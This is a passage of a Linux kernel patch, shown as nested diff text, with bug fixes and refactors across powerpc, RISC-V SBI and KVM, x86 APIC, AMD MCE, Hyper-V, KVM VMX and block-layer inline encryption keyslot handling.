+ 		 $(LINUXINCLUDE)
+diff --git a/arch/powerpc/include/asm/reg.h b/arch/powerpc/include/asm/reg.h
+index 1e8b2e04e626a..8fda87af2fa5e 100644
+--- a/arch/powerpc/include/asm/reg.h
++++ b/arch/powerpc/include/asm/reg.h
+@@ -1310,6 +1310,11 @@
+ #define PVR_VER_E500MC	0x8023
+ #define PVR_VER_E5500	0x8024
+ #define PVR_VER_E6500	0x8040
++#define PVR_VER_7450	0x8000
++#define PVR_VER_7455	0x8001
++#define PVR_VER_7447	0x8002
++#define PVR_VER_7447A	0x8003
++#define PVR_VER_7448	0x8004
+ 
+ /*
+  * For the 8xx processors, all of them report the same PVR family for
+diff --git a/arch/powerpc/kernel/rtas.c b/arch/powerpc/kernel/rtas.c
+index 767ab166933ba..f8d3caad4cf39 100644
+--- a/arch/powerpc/kernel/rtas.c
++++ b/arch/powerpc/kernel/rtas.c
+@@ -421,7 +421,7 @@ static char *__fetch_rtas_last_error(char *altbuf)
+ 				buf = kmalloc(RTAS_ERROR_LOG_MAX, GFP_ATOMIC);
+ 		}
+ 		if (buf)
+-			memcpy(buf, rtas_err_buf, RTAS_ERROR_LOG_MAX);
++			memmove(buf, rtas_err_buf, RTAS_ERROR_LOG_MAX);
+ 	}
+ 
+ 	return buf;
+diff --git a/arch/powerpc/perf/mpc7450-pmu.c b/arch/powerpc/perf/mpc7450-pmu.c
+index 552d51a925d37..db451b9aac35e 100644
+--- a/arch/powerpc/perf/mpc7450-pmu.c
++++ b/arch/powerpc/perf/mpc7450-pmu.c
+@@ -417,9 +417,9 @@ struct power_pmu mpc7450_pmu = {
+ 
+ static int __init init_mpc7450_pmu(void)
+ {
+-	unsigned int pvr = mfspr(SPRN_PVR);
+-
+-	if (PVR_VER(pvr) != PVR_7450)
++	if (!pvr_version_is(PVR_VER_7450) && !pvr_version_is(PVR_VER_7455) &&
++	    !pvr_version_is(PVR_VER_7447) && !pvr_version_is(PVR_VER_7447A) &&
++	    !pvr_version_is(PVR_VER_7448))
+ 		return -ENODEV;
+ 
+ 	return register_power_pmu(&mpc7450_pmu);
+diff --git a/arch/powerpc/platforms/512x/clock-commonclk.c b/arch/powerpc/platforms/512x/clock-commonclk.c
+index 42abeba4f6983..079cb3627eacd 100644
+--- a/arch/powerpc/platforms/512x/clock-commonclk.c
++++ b/arch/powerpc/platforms/512x/clock-commonclk.c
+@@ -986,7 +986,7 @@ static void __init mpc5121_clk_provide_migration_support(void)
+ 
+ #define NODE_PREP do { \
+ 	of_address_to_resource(np, 0, &res); \
+-	snprintf(devname, sizeof(devname), "%08x.%s", res.start, np->name); \
++	snprintf(devname, sizeof(devname), "%pa.%s", &res.start, np->name); \
+ } while (0)
+ 
+ #define NODE_CHK(clkname, clkitem, regnode, regflag) do { \
+diff --git a/arch/powerpc/platforms/embedded6xx/flipper-pic.c b/arch/powerpc/platforms/embedded6xx/flipper-pic.c
+index 609bda2ad5dd2..4d9200bdba78c 100644
+--- a/arch/powerpc/platforms/embedded6xx/flipper-pic.c
++++ b/arch/powerpc/platforms/embedded6xx/flipper-pic.c
+@@ -145,7 +145,7 @@ static struct irq_domain * __init flipper_pic_init(struct device_node *np)
+ 	}
+ 	io_base = ioremap(res.start, resource_size(&res));
+ 
+-	pr_info("controller at 0x%08x mapped to 0x%p\n", res.start, io_base);
++	pr_info("controller at 0x%pa mapped to 0x%p\n", &res.start, io_base);
+ 
+ 	__flipper_quiesce(io_base);
+ 
+diff --git a/arch/powerpc/platforms/embedded6xx/hlwd-pic.c b/arch/powerpc/platforms/embedded6xx/hlwd-pic.c
+index 380b4285cce47..4d2d92de30afd 100644
+--- a/arch/powerpc/platforms/embedded6xx/hlwd-pic.c
++++ b/arch/powerpc/platforms/embedded6xx/hlwd-pic.c
+@@ -171,7 +171,7 @@ static struct irq_domain *__init hlwd_pic_init(struct device_node *np)
+ 		return NULL;
+ 	}
+ 
+-	pr_info("controller at 0x%08x mapped to 0x%p\n", res.start, io_base);
++	pr_info("controller at 0x%pa mapped to 0x%p\n", &res.start, io_base);
+ 
+ 	__hlwd_quiesce(io_base);
+ 
+diff --git a/arch/powerpc/platforms/embedded6xx/wii.c b/arch/powerpc/platforms/embedded6xx/wii.c
+index f4e654a9d4ff6..219659f2ede06 100644
+--- a/arch/powerpc/platforms/embedded6xx/wii.c
++++ b/arch/powerpc/platforms/embedded6xx/wii.c
+@@ -74,8 +74,8 @@ static void __iomem *__init wii_ioremap_hw_regs(char *name, char *compatible)
+ 
+ 	hw_regs = ioremap(res.start, resource_size(&res));
+ 	if (hw_regs) {
+-		pr_info("%s at 0x%08x mapped to 0x%p\n", name,
+-			res.start, hw_regs);
++		pr_info("%s at 0x%pa mapped to 0x%p\n", name,
++			&res.start, hw_regs);
+ 	}
+ 
+ out_put:
+diff --git a/arch/powerpc/sysdev/tsi108_pci.c b/arch/powerpc/sysdev/tsi108_pci.c
+index 5af4c35ff5842..0e42f7bad7db1 100644
+--- a/arch/powerpc/sysdev/tsi108_pci.c
++++ b/arch/powerpc/sysdev/tsi108_pci.c
+@@ -217,9 +217,8 @@ int __init tsi108_setup_pci(struct device_node *dev, u32 cfg_phys, int primary)
+ 
+ 	(hose)->ops = &tsi108_direct_pci_ops;
+ 
+-	printk(KERN_INFO "Found tsi108 PCI host bridge at 0x%08x. "
+-	       "Firmware bus number: %d->%d\n",
+-	       rsrc.start, hose->first_busno, hose->last_busno);
++	pr_info("Found tsi108 PCI host bridge at 0x%pa. Firmware bus number: %d->%d\n",
++		&rsrc.start, hose->first_busno, hose->last_busno);
+ 
+ 	/* Interpret the "ranges" property */
+ 	/* This also maps the I/O region and sets isa_io/mem_base */
+diff --git a/arch/riscv/include/asm/sbi.h b/arch/riscv/include/asm/sbi.h
+index 2a0ef738695ed..9baddaee56238 100644
+--- a/arch/riscv/include/asm/sbi.h
++++ b/arch/riscv/include/asm/sbi.h
+@@ -293,7 +293,7 @@ int sbi_remote_hfence_vvma_asid(const struct cpumask *cpu_mask,
+ 				unsigned long start,
+ 				unsigned long size,
+ 				unsigned long asid);
+-int sbi_probe_extension(int ext);
++long sbi_probe_extension(int ext);
+ 
+ /* Check if current SBI specification version is 0.1 or not */
+ static inline int sbi_spec_is_0_1(void)
+diff --git a/arch/riscv/kernel/cpu_ops.c b/arch/riscv/kernel/cpu_ops.c
+index 8275f237a59df..eb479a88a954e 100644
+--- a/arch/riscv/kernel/cpu_ops.c
++++ b/arch/riscv/kernel/cpu_ops.c
+@@ -27,7 +27,7 @@ const struct cpu_operations cpu_ops_spinwait = {
+ void __init cpu_set_ops(int cpuid)
+ {
+ #if IS_ENABLED(CONFIG_RISCV_SBI)
+-	if (sbi_probe_extension(SBI_EXT_HSM) > 0) {
++	if (sbi_probe_extension(SBI_EXT_HSM)) {
+ 		if (!cpuid)
+ 			pr_info("SBI HSM extension detected\n");
+ 		cpu_ops[cpuid] = &cpu_ops_sbi;
+diff --git a/arch/riscv/kernel/sbi.c b/arch/riscv/kernel/sbi.c
+index 775d3322b422f..5238026f7c0d1 100644
+--- a/arch/riscv/kernel/sbi.c
++++ b/arch/riscv/kernel/sbi.c
+@@ -581,19 +581,18 @@ static void sbi_srst_power_off(void)
+  * sbi_probe_extension() - Check if an SBI extension ID is supported or not.
+  * @extid: The extension ID to be probed.
+  *
+- * Return: Extension specific nonzero value f yes, -ENOTSUPP otherwise.
++ * Return: 1 or an extension specific nonzero value if yes, 0 otherwise.
+  */
+-int sbi_probe_extension(int extid)
++long sbi_probe_extension(int extid)
+ {
+ 	struct sbiret ret;
+ 
+ 	ret = sbi_ecall(SBI_EXT_BASE, SBI_EXT_BASE_PROBE_EXT, extid,
+ 			0, 0, 0, 0, 0);
+ 	if (!ret.error)
+-		if (ret.value)
+-			return ret.value;
++		return ret.value;
+ 
+-	return -ENOTSUPP;
++	return 0;
+ }
+ EXPORT_SYMBOL(sbi_probe_extension);
+ 
+@@ -662,26 +661,26 @@ void __init sbi_init(void)
+ 	if (!sbi_spec_is_0_1()) {
+ 		pr_info("SBI implementation ID=0x%lx Version=0x%lx\n",
+ 			sbi_get_firmware_id(), sbi_get_firmware_version());
+-		if (sbi_probe_extension(SBI_EXT_TIME) > 0) {
++		if (sbi_probe_extension(SBI_EXT_TIME)) {
+ 			__sbi_set_timer = __sbi_set_timer_v02;
+ 			pr_info("SBI TIME extension detected\n");
+ 		} else {
+ 			__sbi_set_timer = __sbi_set_timer_v01;
+ 		}
+-		if (sbi_probe_extension(SBI_EXT_IPI) > 0) {
++		if (sbi_probe_extension(SBI_EXT_IPI)) {
+ 			__sbi_send_ipi	= __sbi_send_ipi_v02;
+ 			pr_info("SBI IPI extension detected\n");
+ 		} else {
+ 			__sbi_send_ipi	= __sbi_send_ipi_v01;
+ 		}
+-		if (sbi_probe_extension(SBI_EXT_RFENCE) > 0) {
++		if (sbi_probe_extension(SBI_EXT_RFENCE)) {
+ 			__sbi_rfence	= __sbi_rfence_v02;
+ 			pr_info("SBI RFENCE extension detected\n");
+ 		} else {
+ 			__sbi_rfence	= __sbi_rfence_v01;
+ 		}
+ 		if ((sbi_spec_version >= sbi_mk_version(0, 3)) &&
+-		    (sbi_probe_extension(SBI_EXT_SRST) > 0)) {
++		    sbi_probe_extension(SBI_EXT_SRST)) {
+ 			pr_info("SBI SRST extension detected\n");
+ 			pm_power_off = sbi_srst_power_off;
+ 			sbi_srst_reboot_nb.notifier_call = sbi_srst_reboot;
+diff --git a/arch/riscv/kvm/main.c b/arch/riscv/kvm/main.c
+index df2d8716851f2..62eedad7ec095 100644
+--- a/arch/riscv/kvm/main.c
++++ b/arch/riscv/kvm/main.c
+@@ -84,7 +84,7 @@ int kvm_arch_init(void *opaque)
+ 		return -ENODEV;
+ 	}
+ 
+-	if (sbi_probe_extension(SBI_EXT_RFENCE) <= 0) {
++	if (!sbi_probe_extension(SBI_EXT_RFENCE)) {
+ 		kvm_info("require SBI RFENCE extension\n");
+ 		return -ENODEV;
+ 	}
+diff --git a/arch/riscv/kvm/mmu.c b/arch/riscv/kvm/mmu.c
+index 3620ecac2fa14..e47aeb6f05a6e 100644
+--- a/arch/riscv/kvm/mmu.c
++++ b/arch/riscv/kvm/mmu.c
+@@ -630,6 +630,13 @@ int kvm_riscv_gstage_map(struct kvm_vcpu *vcpu,
+ 			!(memslot->flags & KVM_MEM_READONLY)) ? true : false;
+ 	unsigned long vma_pagesize, mmu_seq;
+ 
++	/* We need minimum second+third level pages */
++	ret = kvm_mmu_topup_memory_cache(pcache, gstage_pgd_levels);
++	if (ret) {
++		kvm_err("Failed to topup G-stage cache\n");
++		return ret;
++	}
++
+ 	mmap_read_lock(current->mm);
+ 
+ 	vma = find_vma_intersection(current->mm, hva, hva + 1);
+@@ -650,6 +657,15 @@ int kvm_riscv_gstage_map(struct kvm_vcpu *vcpu,
+ 	if (vma_pagesize == PMD_SIZE || vma_pagesize == PGDIR_SIZE)
+ 		gfn = (gpa & huge_page_mask(hstate_vma(vma))) >> PAGE_SHIFT;
+ 
++	/*
++	 * Read mmu_invalidate_seq so that KVM can detect if the results of
+	 * vma_lookup() or gfn_to_pfn_prot() become stale prior to acquiring
++	 * kvm->mmu_lock.
++	 *
++	 * Rely on mmap_read_unlock() for an implicit smp_rmb(), which pairs
++	 * with the smp_wmb() in kvm_mmu_invalidate_end().
++	 */
++	mmu_seq = kvm->mmu_invalidate_seq;
+ 	mmap_read_unlock(current->mm);
+ 
+ 	if (vma_pagesize != PGDIR_SIZE &&
+@@ -659,15 +675,6 @@ int kvm_riscv_gstage_map(struct kvm_vcpu *vcpu,
+ 		return -EFAULT;
+ 	}
+ 
+-	/* We need minimum second+third level pages */
+-	ret = kvm_mmu_topup_memory_cache(pcache, gstage_pgd_levels);
+-	if (ret) {
+-		kvm_err("Failed to topup G-stage cache\n");
+-		return ret;
+-	}
+-
+-	mmu_seq = kvm->mmu_invalidate_seq;
+-
+ 	hfn = gfn_to_pfn_prot(kvm, gfn, is_write, &writable);
+ 	if (hfn == KVM_PFN_ERR_HWPOISON) {
+ 		send_sig_mceerr(BUS_MCEERR_AR, (void __user *)hva,
+diff --git a/arch/riscv/mm/init.c b/arch/riscv/mm/init.c
+index 6f47ced3175b4..6315a3c942259 100644
+--- a/arch/riscv/mm/init.c
++++ b/arch/riscv/mm/init.c
+@@ -842,8 +842,7 @@ static void __init create_kernel_page_table(pgd_t *pgdir, bool early)
+  * this means 2 PMD entries whereas for 32-bit kernel, this is only 1 PGDIR
+  * entry.
+  */
+-static void __init create_fdt_early_page_table(pgd_t *pgdir,
+-					       uintptr_t fix_fdt_va,
++static void __init create_fdt_early_page_table(uintptr_t fix_fdt_va,
+ 					       uintptr_t dtb_pa)
+ {
+ 	uintptr_t pa = dtb_pa & ~(PMD_SIZE - 1);
+@@ -1033,8 +1032,7 @@ asmlinkage void __init setup_vm(uintptr_t dtb_pa)
+ 	create_kernel_page_table(early_pg_dir, true);
+ 
+ 	/* Setup early mapping for FDT early scan */
+-	create_fdt_early_page_table(early_pg_dir,
+-				    __fix_to_virt(FIX_FDT), dtb_pa);
++	create_fdt_early_page_table(__fix_to_virt(FIX_FDT), dtb_pa);
+ 
+ 	/*
+ 	 * Bootime fixmap only can handle PMD_SIZE mapping. Thus, boot-ioremap
+diff --git a/arch/riscv/mm/ptdump.c b/arch/riscv/mm/ptdump.c
+index 830e7de65e3a3..20a9f991a6d74 100644
+--- a/arch/riscv/mm/ptdump.c
++++ b/arch/riscv/mm/ptdump.c
+@@ -59,10 +59,6 @@ struct ptd_mm_info {
+ };
+ 
+ enum address_markers_idx {
+-#ifdef CONFIG_KASAN
+-	KASAN_SHADOW_START_NR,
+-	KASAN_SHADOW_END_NR,
+-#endif
+ 	FIXMAP_START_NR,
+ 	FIXMAP_END_NR,
+ 	PCI_IO_START_NR,
+@@ -74,6 +70,10 @@ enum address_markers_idx {
+ 	VMALLOC_START_NR,
+ 	VMALLOC_END_NR,
+ 	PAGE_OFFSET_NR,
++#ifdef CONFIG_KASAN
++	KASAN_SHADOW_START_NR,
++	KASAN_SHADOW_END_NR,
++#endif
+ #ifdef CONFIG_64BIT
+ 	MODULES_MAPPING_NR,
+ 	KERNEL_MAPPING_NR,
+@@ -82,10 +82,6 @@ enum address_markers_idx {
+ };
+ 
+ static struct addr_marker address_markers[] = {
+-#ifdef CONFIG_KASAN
+-	{0, "Kasan shadow start"},
+-	{0, "Kasan shadow end"},
+-#endif
+ 	{0, "Fixmap start"},
+ 	{0, "Fixmap end"},
+ 	{0, "PCI I/O start"},
+@@ -97,6 +93,10 @@ static struct addr_marker address_markers[] = {
+ 	{0, "vmalloc() area"},
+ 	{0, "vmalloc() end"},
+ 	{0, "Linear mapping"},
++#ifdef CONFIG_KASAN
++	{0, "Kasan shadow start"},
++	{0, "Kasan shadow end"},
++#endif
+ #ifdef CONFIG_64BIT
+ 	{0, "Modules/BPF mapping"},
+ 	{0, "Kernel mapping"},
+@@ -362,10 +362,6 @@ static int __init ptdump_init(void)
+ {
+ 	unsigned int i, j;
+ 
+-#ifdef CONFIG_KASAN
+-	address_markers[KASAN_SHADOW_START_NR].start_address = KASAN_SHADOW_START;
+-	address_markers[KASAN_SHADOW_END_NR].start_address = KASAN_SHADOW_END;
+-#endif
+ 	address_markers[FIXMAP_START_NR].start_address = FIXADDR_START;
+ 	address_markers[FIXMAP_END_NR].start_address = FIXADDR_TOP;
+ 	address_markers[PCI_IO_START_NR].start_address = PCI_IO_START;
+@@ -377,6 +373,10 @@ static int __init ptdump_init(void)
+ 	address_markers[VMALLOC_START_NR].start_address = VMALLOC_START;
+ 	address_markers[VMALLOC_END_NR].start_address = VMALLOC_END;
+ 	address_markers[PAGE_OFFSET_NR].start_address = PAGE_OFFSET;
++#ifdef CONFIG_KASAN
++	address_markers[KASAN_SHADOW_START_NR].start_address = KASAN_SHADOW_START;
++	address_markers[KASAN_SHADOW_END_NR].start_address = KASAN_SHADOW_END;
++#endif
+ #ifdef CONFIG_64BIT
+ 	address_markers[MODULES_MAPPING_NR].start_address = MODULES_VADDR;
+ 	address_markers[KERNEL_MAPPING_NR].start_address = kernel_map.virt_addr;
+diff --git a/arch/sh/kernel/cpu/sh4/sq.c b/arch/sh/kernel/cpu/sh4/sq.c
+index a76b94e41e913..8ddfe9989f5fc 100644
+--- a/arch/sh/kernel/cpu/sh4/sq.c
++++ b/arch/sh/kernel/cpu/sh4/sq.c
+@@ -382,7 +382,7 @@ static int __init sq_api_init(void)
+ 	if (unlikely(!sq_cache))
+ 		return ret;
+ 
+-	sq_bitmap = kzalloc(size, GFP_KERNEL);
++	sq_bitmap = kcalloc(size, sizeof(long), GFP_KERNEL);
+ 	if (unlikely(!sq_bitmap))
+ 		goto out;
+ 
+diff --git a/arch/x86/include/asm/intel-family.h b/arch/x86/include/asm/intel-family.h
+index cbaf174d8efd9..b3af2d45bbbb5 100644
+--- a/arch/x86/include/asm/intel-family.h
++++ b/arch/x86/include/asm/intel-family.h
+@@ -125,6 +125,8 @@
+ 
+ #define INTEL_FAM6_LUNARLAKE_M		0xBD
+ 
++#define INTEL_FAM6_ARROWLAKE		0xC6
++
+ /* "Small Core" Processors (Atom/E-Core) */
+ 
+ #define INTEL_FAM6_ATOM_BONNELL		0x1C /* Diamondville, Pineview */
+diff --git a/arch/x86/kernel/apic/apic.c b/arch/x86/kernel/apic/apic.c
+index 20d9a604da7c4..7705571100518 100644
+--- a/arch/x86/kernel/apic/apic.c
++++ b/arch/x86/kernel/apic/apic.c
+@@ -422,10 +422,9 @@ static unsigned int reserve_eilvt_offset(int offset, unsigned int new)
+ 		if (vector && !eilvt_entry_is_changeable(vector, new))
+ 			/* may not change if vectors are different */
+ 			return rsvd;
+-		rsvd = atomic_cmpxchg(&eilvt_offsets[offset], rsvd, new);
+-	} while (rsvd != new);
++	} while (!atomic_try_cmpxchg(&eilvt_offsets[offset], &rsvd, new));
+ 
+-	rsvd &= ~APIC_EILVT_MASKED;
++	rsvd = new & ~APIC_EILVT_MASKED;
+ 	if (rsvd && rsvd != vector)
+ 		pr_info("LVT offset %d assigned for vector 0x%02x\n",
+ 			offset, rsvd);
+diff --git a/arch/x86/kernel/apic/io_apic.c b/arch/x86/kernel/apic/io_apic.c
+index a868b76cd3d42..efa87b6bb1cde 100644
+--- a/arch/x86/kernel/apic/io_apic.c
++++ b/arch/x86/kernel/apic/io_apic.c
+@@ -2480,17 +2480,21 @@ static int io_apic_get_redir_entries(int ioapic)
+ 
+ unsigned int arch_dynirq_lower_bound(unsigned int from)
+ {
++	unsigned int ret;
++
+ 	/*
+ 	 * dmar_alloc_hwirq() may be called before setup_IO_APIC(), so use
+ 	 * gsi_top if ioapic_dynirq_base hasn't been initialized yet.
+ 	 */
+-	if (!ioapic_initialized)
+-		return gsi_top;
++	ret = ioapic_dynirq_base ? : gsi_top;
++
+ 	/*
+-	 * For DT enabled machines ioapic_dynirq_base is irrelevant and not
+-	 * updated. So simply return @from if ioapic_dynirq_base == 0.
++	 * For DT enabled machines ioapic_dynirq_base is irrelevant and
++	 * always 0. gsi_top can be 0 if there is no IO/APIC registered.
++	 * 0 is an invalid interrupt number for dynamic allocations. Return
++	 * @from instead.
+ 	 */
+-	return ioapic_dynirq_base ? : from;
++	return ret ? : from;
+ }
+ 
+ #ifdef CONFIG_X86_32
+diff --git a/arch/x86/kernel/cpu/mce/amd.c b/arch/x86/kernel/cpu/mce/amd.c
+index 10fb5b5c9efa4..5518272061bfb 100644
+--- a/arch/x86/kernel/cpu/mce/amd.c
++++ b/arch/x86/kernel/cpu/mce/amd.c
+@@ -235,10 +235,10 @@ static DEFINE_PER_CPU(struct threshold_bank **, threshold_banks);
+  * A list of the banks enabled on each logical CPU. Controls which respective
+  * descriptors to initialize later in mce_threshold_create_device().
+  */
+-static DEFINE_PER_CPU(unsigned int, bank_map);
++static DEFINE_PER_CPU(u64, bank_map);
+ 
+ /* Map of banks that have more than MCA_MISC0 available. */
+-static DEFINE_PER_CPU(u32, smca_misc_banks_map);
++static DEFINE_PER_CPU(u64, smca_misc_banks_map);
+ 
+ static void amd_threshold_interrupt(void);
+ static void amd_deferred_error_interrupt(void);
+@@ -267,7 +267,7 @@ static void smca_set_misc_banks_map(unsigned int bank, unsigned int cpu)
+ 		return;
+ 
+ 	if (low & MASK_BLKPTR_LO)
+-		per_cpu(smca_misc_banks_map, cpu) |= BIT(bank);
++		per_cpu(smca_misc_banks_map, cpu) |= BIT_ULL(bank);
+ 
+ }
+ 
+@@ -528,7 +528,7 @@ static u32 smca_get_block_address(unsigned int bank, unsigned int block,
+ 	if (!block)
+ 		return MSR_AMD64_SMCA_MCx_MISC(bank);
+ 
+-	if (!(per_cpu(smca_misc_banks_map, cpu) & BIT(bank)))
++	if (!(per_cpu(smca_misc_banks_map, cpu) & BIT_ULL(bank)))
+ 		return 0;
+ 
+ 	return MSR_AMD64_SMCA_MCx_MISCy(bank, block - 1);
+@@ -572,7 +572,7 @@ prepare_threshold_block(unsigned int bank, unsigned int block, u32 addr,
+ 	int new;
+ 
+ 	if (!block)
+-		per_cpu(bank_map, cpu) |= (1 << bank);
++		per_cpu(bank_map, cpu) |= BIT_ULL(bank);
+ 
+ 	memset(&b, 0, sizeof(b));
+ 	b.cpu			= cpu;
+@@ -884,7 +884,7 @@ static void amd_threshold_interrupt(void)
+ 		return;
+ 
+ 	for (bank = 0; bank < this_cpu_read(mce_num_banks); ++bank) {
+-		if (!(per_cpu(bank_map, cpu) & (1 << bank)))
++		if (!(per_cpu(bank_map, cpu) & BIT_ULL(bank)))
+ 			continue;
+ 
+ 		first_block = bp[bank]->blocks;
+@@ -1362,7 +1362,7 @@ int mce_threshold_create_device(unsigned int cpu)
+ 		return -ENOMEM;
+ 
+ 	for (bank = 0; bank < numbanks; ++bank) {
+-		if (!(this_cpu_read(bank_map) & (1 << bank)))
++		if (!(this_cpu_read(bank_map) & BIT_ULL(bank)))
+ 			continue;
+ 		err = threshold_create_bank(bp, cpu, bank);
+ 		if (err) {
+diff --git a/arch/x86/kernel/cpu/mshyperv.c b/arch/x86/kernel/cpu/mshyperv.c
+index 831613959a92a..34d9e899e471e 100644
+--- a/arch/x86/kernel/cpu/mshyperv.c
++++ b/arch/x86/kernel/cpu/mshyperv.c
+@@ -291,12 +291,16 @@ static void __init ms_hyperv_init_platform(void)
+ 	 * To mirror what Windows does we should extract CPU management
+ 	 * features and use the ReservedIdentityBit to detect if Linux is the
+ 	 * root partition. But that requires negotiating CPU management
+-	 * interface (a process to be finalized).
++	 * interface (a process to be finalized). For now, use the privilege
++	 * flag as the indicator for running as root.
+ 	 *
+-	 * For now, use the privilege flag as the indicator for running as
+-	 * root.
++	 * Hyper-V should never specify running as root and as a Confidential
++	 * VM. But to protect against a compromised/malicious Hyper-V trying
++	 * to exploit root behavior to expose Confidential VM memory, ignore
++	 * the root partition setting if also a Confidential VM.
+ 	 */
+-	if (cpuid_ebx(HYPERV_CPUID_FEATURES) & HV_CPU_MANAGEMENT) {
++	if ((ms_hyperv.priv_high & HV_CPU_MANAGEMENT) &&
++	    !(ms_hyperv.priv_high & HV_ISOLATION)) {
+ 		hv_root_partition = true;
+ 		pr_info("Hyper-V: running as root partition\n");
+ 	}
+diff --git a/arch/x86/kvm/vmx/vmx.c b/arch/x86/kvm/vmx/vmx.c
+index bc868958e91fe..4c9116d223df5 100644
+--- a/arch/x86/kvm/vmx/vmx.c
++++ b/arch/x86/kvm/vmx/vmx.c
+@@ -7830,6 +7830,21 @@ static int vmx_check_intercept(struct kvm_vcpu *vcpu,
+ 		/* FIXME: produce nested vmexit and return X86EMUL_INTERCEPTED.  */
+ 		break;
+ 
++	case x86_intercept_pause:
++		/*
++		 * PAUSE is a single-byte NOP with a REPE prefix, i.e. collides
++		 * with vanilla NOPs in the emulator.  Apply the interception
++		 * check only to actual PAUSE instructions.  Don't check
++		 * PAUSE-loop-exiting, software can't expect a given PAUSE to
++		 * exit, i.e. KVM is within its rights to allow L2 to execute
++		 * the PAUSE.
++		 */
++		if ((info->rep_prefix != REPE_PREFIX) ||
++		    !nested_cpu_has2(vmcs12, CPU_BASED_PAUSE_EXITING))
++			return X86EMUL_CONTINUE;
++
++		break;
++
+ 	/* TODO: check more intercepts... */
+ 	default:
+ 		break;
+diff --git a/block/blk-crypto-internal.h b/block/blk-crypto-internal.h
+index e6818ffaddbf8..8ac5597dc69c3 100644
+--- a/block/blk-crypto-internal.h
++++ b/block/blk-crypto-internal.h
+@@ -65,6 +65,23 @@ static inline bool blk_crypto_rq_is_encrypted(struct request *rq)
+ 	return rq->crypt_ctx;
+ }
+ 
++static inline bool blk_crypto_rq_has_keyslot(struct request *rq)
++{
++	return rq->crypt_keyslot;
++}
++
++blk_status_t blk_crypto_get_keyslot(struct blk_crypto_profile *profile,
++				    const struct blk_crypto_key *key,
++				    struct blk_crypto_keyslot **slot_ptr);
++
++void blk_crypto_put_keyslot(struct blk_crypto_keyslot *slot);
++
++int __blk_crypto_evict_key(struct blk_crypto_profile *profile,
++			   const struct blk_crypto_key *key);
++
++bool __blk_crypto_cfg_supported(struct blk_crypto_profile *profile,
++				const struct blk_crypto_config *cfg);
++
+ #else /* CONFIG_BLK_INLINE_ENCRYPTION */
+ 
+ static inline int blk_crypto_sysfs_register(struct request_queue *q)
+@@ -105,6 +122,11 @@ static inline bool blk_crypto_rq_is_encrypted(struct request *rq)
+ 	return false;
+ }
+ 
++static inline bool blk_crypto_rq_has_keyslot(struct request *rq)
++{
++	return false;
++}
++
+ #endif /* CONFIG_BLK_INLINE_ENCRYPTION */
+ 
+ void __bio_crypt_advance(struct bio *bio, unsigned int bytes);
+@@ -139,14 +161,21 @@ static inline bool blk_crypto_bio_prep(struct bio **bio_ptr)
+ 	return true;
+ }
+ 
+-blk_status_t __blk_crypto_init_request(struct request *rq);
+-static inline blk_status_t blk_crypto_init_request(struct request *rq)
++blk_status_t __blk_crypto_rq_get_keyslot(struct request *rq);
++static inline blk_status_t blk_crypto_rq_get_keyslot(struct request *rq)
+ {
+ 	if (blk_crypto_rq_is_encrypted(rq))
+-		return __blk_crypto_init_request(rq);
++		return __blk_crypto_rq_get_keyslot(rq);
+ 	return BLK_STS_OK;
+ }
+ 
++void __blk_crypto_rq_put_keyslot(struct request *rq);
++static inline void blk_crypto_rq_put_keyslot(struct request *rq)
++{
++	if (blk_crypto_rq_has_keyslot(rq))
++		__blk_crypto_rq_put_keyslot(rq);
++}
++
+ void __blk_crypto_free_request(struct request *rq);
+ static inline void blk_crypto_free_request(struct request *rq)
+ {
+@@ -185,7 +214,7 @@ static inline blk_status_t blk_crypto_insert_cloned_request(struct request *rq)
+ {
+ 
+ 	if (blk_crypto_rq_is_encrypted(rq))
+-		return blk_crypto_init_request(rq);
++		return blk_crypto_rq_get_keyslot(rq);
+ 	return BLK_STS_OK;
+ }
+ 
+diff --git a/block/blk-crypto-profile.c b/block/blk-crypto-profile.c
+index 96c511967386d..3290c03c9918d 100644
+--- a/block/blk-crypto-profile.c
++++ b/block/blk-crypto-profile.c
+@@ -32,6 +32,7 @@
+ #include <linux/wait.h>
+ #include <linux/blkdev.h>
+ #include <linux/blk-integrity.h>
++#include "blk-crypto-internal.h"
+ 
+ struct blk_crypto_keyslot {
+ 	atomic_t slot_refs;
+@@ -353,28 +354,16 @@ bool __blk_crypto_cfg_supported(struct blk_crypto_profile *profile,
+ 	return true;
+ }
+ 
+-/**
+- * __blk_crypto_evict_key() - Evict a key from a device.
+- * @profile: the crypto profile of the device
+- * @key: the key to evict.  It must not still be used in any I/O.
+- *
+- * If the device has keyslots, this finds the keyslot (if any) that contains the
+- * specified key and calls the driver's keyslot_evict function to evict it.
+- *
+- * Otherwise, this just calls the driver's keyslot_evict function if it is
+- * implemented, passing just the key (without any particular keyslot).  This
+- * allows layered devices to evict the key from their underlying devices.
+- *
+- * Context: Process context. Takes and releases profile->lock.
+- * Return: 0 on success or if there's no keyslot with the specified key, -EBUSY
+- *	   if the keyslot is still in use, or another -errno value on other
+- *	   error.
++/*
++ * This is an internal function that evicts a key from an inline encryption
++ * device that can be either a real device or the blk-crypto-fallback "device".
++ * It is used only by blk_crypto_evict_key(); see that function for details.
+  */
+ int __blk_crypto_evict_key(struct blk_crypto_profile *profile,
+ 			   const struct blk_crypto_key *key)
+ {
+ 	struct blk_crypto_keyslot *slot;
+-	int err = 0;
++	int err;
+ 
+ 	if (profile->num_slots == 0) {
+ 		if (profile->ll_ops.keyslot_evict) {
+@@ -388,22 +377,30 @@ int __blk_crypto_evict_key(struct blk_crypto_profile *profile,
+ 
+ 	blk_crypto_hw_enter(profile);
+ 	slot = blk_crypto_find_keyslot(profile, key);
+-	if (!slot)
+-		goto out_unlock;
++	if (!slot) {
++		/*
++		 * Not an error, since a key not in use by I/O is not guaranteed
++		 * to be in a keyslot.  There can be more keys than keyslots.
++		 */
++		err = 0;
++		goto out;
++	}
+ 
+ 	if (WARN_ON_ONCE(atomic_read(&slot->slot_refs) != 0)) {
++		/* BUG: key is still in use by I/O */
+ 		err = -EBUSY;
+-		goto out_unlock;
++		goto out_remove;
+ 	}
+ 	err = profile->ll_ops.keyslot_evict(profile, key,
+ 					    blk_crypto_keyslot_index(slot));
+-	if (err)
+-		goto out_unlock;
+-
++out_remove:
++	/*
++	 * Callers free the key even on error, so unlink the key from the hash
++	 * table and clear slot->key even on error.
++	 */
+ 	hlist_del(&slot->hash_node);
+ 	slot->key = NULL;
+-	err = 0;
+-out_unlock:
++out:
+ 	blk_crypto_hw_exit(profile);
+ 	return err;
+ }
+diff --git a/block/blk-crypto.c b/block/blk-crypto.c
+index a496aaef85ba4..6733286d506f6 100644
+--- a/block/blk-crypto.c
++++ b/block/blk-crypto.c
